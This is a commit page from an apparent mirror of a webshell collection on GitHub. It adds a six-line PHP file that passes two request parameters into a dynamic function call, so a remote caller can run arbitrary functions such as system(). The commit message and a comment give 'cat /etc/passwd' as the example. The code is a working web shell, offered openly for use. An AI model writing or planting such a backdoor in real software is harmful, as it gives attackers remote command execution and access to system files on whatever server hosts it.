mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
Create simple_2022_08_15.php
running : system('cat /etc/passwd')

This commit is contained in:
6
php/simple_2022_08_15.php
Normal file
6
php/simple_2022_08_15.php
Normal file
@@ -0,0 +1,6 @@
|
||||
<?php
|
||||
$_=$POST['1'];
|
||||
$__=$POST['2'];
|
||||
// running -> system('cat /etc/passwd');
|
||||
$_($__);
|
||||
?>
|
||||
Reference in New Issue
Block a user